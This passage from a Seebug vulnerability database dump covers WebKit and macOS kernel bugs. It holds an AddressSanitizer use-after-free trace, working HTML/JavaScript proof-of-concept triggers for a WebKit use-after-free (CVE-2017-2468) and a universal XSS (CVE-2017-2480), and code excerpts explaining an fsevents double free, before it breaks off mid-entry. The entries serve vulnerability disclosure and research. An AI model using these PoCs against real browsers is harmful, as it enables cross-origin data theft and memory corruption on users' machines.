(WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)\r\n #25 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)\r\n #26 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)\r\n #27 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)\r\n #28 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)\r\n #29 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)\r\n #30 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)\r\n #31 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)\r\n #32 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)\r\n #33 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)\r\n #34 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)\r\n #35 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)\r\n #36 0x116df2baf in WebCore::timerFired(__CFRunLoopTimer*, void*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c96baf)\r\n #37 0x7fff93728243 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x91243)\r\n #38 0x7fff93727ece in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90ece)\r\n #39 0x7fff93727a29 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x90a29)\r\n #40 0x7fff9371f3e0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x883e0)\r\n #41 0x7fff9371e973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)\r\n #42 0x7fff92caaacb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30acb)\r\n #43 0x7fff92caa900 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30900)\r\n #44 0x7fff92caa735 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30735)\r\n #45 0x7fff91250ae3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x46ae3)\r\n #46 0x7fff919cb21e in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c121e)\r\n #47 0x7fff91245464 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3b464)\r\n #48 0x7fff9120fd7f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x5d7f)\r\n #49 0x7fffa8edb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)\r\n #50 0x7fffa8eda2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)\r\n #51 0x1077d1b73 in main (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)\r\n #52 0x7fffa8c77254 in start (/usr/lib/system/libdyld.dylib+0x5254)\r\n\r\n0x61a0000c5a80 is located 0 bytes inside of 1232-byte region [0x61a0000c5a80,0x61a0000c5f50)\r\nfreed by thread T0 here:\r\n #0 0x10a087db9 in wrap_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4adb9)\r\n #1 0x10d0da25b in bmalloc::Deallocator::deallocateSlowCase(void*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c725b)\r\n #2 0x11759427e in WTF::RefPtr<WebCore::Widget>::operator=(std::nullptr_t) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x243827e)\r\n #3 0x117592d19 in WebCore::RenderWidget::setWidget(WTF::RefPtr<WebCore::Widget>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2436d19)\r\n #4 0x115bd46be in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa786be)\r\n #5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)\r\n #6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)\r\n #7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)\r\n #8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)\r\n #9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)\r\n #10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)\r\n #11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)\r\n #12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)\r\n #13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)\r\n #14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)\r\n #15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)\r\n #16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)\r\n #17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)\r\n #18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)\r\n #19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)\r\n #20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)\r\n #21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)\r\n #22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)\r\n #23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)\r\n #24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)\r\n #25 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)\r\n #26 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)\r\n #27 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)\r\n #28 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)\r\n #29 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x10a087bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)\r\n #1 0x10d0d901e in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c601e)\r\n #2 0x10d074535 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1861535)\r\n #3 0x115c14a59 in WebCore::FrameView::create(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab8a59)\r\n #4 0x115bd459c in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7859c)\r\n #5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)\r\n #6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)\r\n #7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)\r\n #8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)\r\n #9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)\r\n #10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)\r\n #11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)\r\n #12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)\r\n #13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)\r\n #14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)\r\n #15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)\r\n #16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)\r\n #17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)\r\n #18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)\r\n #19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)\r\n #20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)\r\n #21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)\r\n #22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)\r\n #23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)\r\n #24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)\r\n #25 0x115be043c in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8443c)\r\n #26 0x107e0ed25 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x626d25)\r\n #27 0x117966328 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280a328)\r\n #28 0x117964335 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2808335)\r\n #29 0x117963f47 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2807f47)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a) in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&)\r\nShadow bytes around the buggy address:\r\n 0x1c3400018b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b20: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa\r\n 0x1c3400018b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x1c3400018b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x1c3400018b50:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018ba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==54938==ABORTING\r\n```", "cvss3": {}, "published": "2017-04-07T00:00:00", "type": "seebug", "title": "WebKit: Use-After-Free via Document::adoptNode (CVE-2017-2468)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2468"], "modified": "2017-04-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92920", "id": "SSV:92920", "sourceData": "\n <body>\r\n<script>\r\n\r\nvar s = document.body.appendChild(document.createElement('script'));\r\ns.type = '0';\r\ns.textContent = 'document.body.appendChild(parent.i0)';\r\n\r\nvar i0 = s.appendChild(document.createElement('iframe'));\r\ns.type = '';\r\n\r\nvar f = document.body.appendChild(document.createElement('iframe'));\r\nf.contentDocument.adoptNode(i0);\r\nf.src = 'about:blank';\r\n\r\n</script>\r\n</body>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92920", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:00:00", "description": "Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.\r\n```\r\nbool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)\r\n{\r\n // Support for <frame src=\"javascript:string\">\r\n URL scriptURL;\r\n URL url;\r\n if (protocolIsJavaScript(urlString)) {\r\n scriptURL = completeURL(urlString); // completeURL() encodes the URL.\r\n url = blankURL();\r\n } else\r\n url = completeURL(urlString);\r\n\r\n if (shouldConvertInvalidURLsToBlank() && !url.isValid())\r\n url = blankURL();\r\n\r\n Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.\r\n if (!frame)\r\n return false;\r\n\r\n if (!scriptURL.isEmpty())\r\n frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom\r\n\r\n return true;\r\n}\r\n```\r\n\r\nA SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.\r\n\r\nTested on Safari 10.0.3(12602.4.8).\r\n\r\nPoC:\r\n```\r\n<body>\r\n<p>click anywhere</p>\r\n<script>\r\n\r\nwindow.onclick = () => {\r\n window.onclick = null;\r\n\r\n f = document.createElement('iframe');\r\n f.src = 'javascript:alert(location)';\r\n f.onload = () => {\r\n f.onload = null;\r\n\r\n let a = f.contentDocument.createElement('a');\r\n a.href = 'https://abc.xyz/';\r\n a.click();\r\n\r\n window.showModalDialog(URL.createObjectURL(new Blob([`\r\n<script>\r\nlet it = setInterval(() => {\r\n try {\r\n opener[0].document.x;\r\n } catch (e) {\r\n clearInterval(it);\r\n\r\n window.close();\r\n }\r\n}, 100);\r\n</scrip` + 't>'], {type: 'text/html'})));\r\n };\r\n\r\n document.body.appendChild(f);\r\n};\r\n\r\ncached.src = kUrl;\r\n\r\n</script>\r\n</body>\r\n```", "cvss3": {}, "published": "2017-04-07T00:00:00", "type": "seebug", "title": "WebKit: UXSS via a synchronous page load\uff08CVE-2017-2480\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2480"], "modified": "2017-04-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92923", "id": "SSV:92923", "sourceData": "\n <body>\r\n<p>click anywhere</p>\r\n<script>\r\n\r\nwindow.onclick = () => {\r\n window.onclick = null;\r\n\r\n f = document.createElement('iframe');\r\n f.src = 'javascript:alert(location)';\r\n f.onload = () => {\r\n f.onload = null;\r\n\r\n let a = f.contentDocument.createElement('a');\r\n a.href = 'https://abc.xyz/';\r\n a.click();\r\n\r\n window.showModalDialog(URL.createObjectURL(new Blob([`\r\n<script>\r\nlet it = setInterval(() => {\r\n try {\r\n opener[0].document.x;\r\n } catch (e) {\r\n clearInterval(it);\r\n\r\n window.close();\r\n }\r\n}, 100);\r\n</scrip` + 't>'], {type: 'text/html'})));\r\n };\r\n\r\n document.body.appendChild(f);\r\n};\r\n\r\ncached.src = kUrl;\r\n\r\n</script>\r\n</body>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92923", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T12:00:18", "description": "fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents\n\nHeres the code for the FSEVENTS_DEVICE_FILTER_64 ioctl: `` case FSEVENTS_DEVICE_FILTER_64: if (! proc_is64bit(vfs_context_proc(ctx))) { ret = EINVAL; break; } devfilt_args = (fsevent_dev_filter_args64 *)data;\n \n \n handle_dev_filter:\n {\n int new_num_devices;\n dev_t *devices_not_to_watch, *tmp=NULL;\n \n if (devfilt_args->num_devices > 256) {\n ret = EINVAL;\n break;\n }\n \n new_num_devices = devfilt_args->num_devices;\n if (new_num_devices == 0) {\n tmp = fseh->watcher->devices_not_to_watch; < ------ (a)\n \n lock_watch_table(); <------ (b)\n fseh->watcher->devices_not_to_watch = NULL;\n fseh->watcher->num_devices = new_num_devices;\n unlock_watch_table(); <------ (c)\n \n if (tmp) {\n FREE(tmp, M_TEMP); <------ (d)\n }\n break;\n }\n \n\n``\n\nThere's nothing stopping two threads seeing the same value for devices_not_to_watch at (a), assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this.\n\nThis leads to a double free, which if you also race allocations from the same zone can lead to an exploitable kernel use after free.\n\n`/dev/fsevents is: crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents`\n\nso this is a privesc from either root or members of the wheel group to the kernel\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2\n\n(build with-O3)\n\nAttachment: [fsevents_race. c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=271278>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel double free due to bad locking in fsevents device\uff08CVE-2017-2490\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2490"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92884", "id": "SSV:92884", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:00:17", "description": "The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:\n\n`` case BIOCSBLEN: /_ u_int _/ if (d->bd_bif != 0) error = EINVAL; else { u_int size;\n \n \n bcopy(addr, &size, sizeof (size));\n \n if (size > bpf_maxbufsize)\n size = bpf_maxbufsize;\n else if (size < BPF_MINBUFSIZE)\n size = 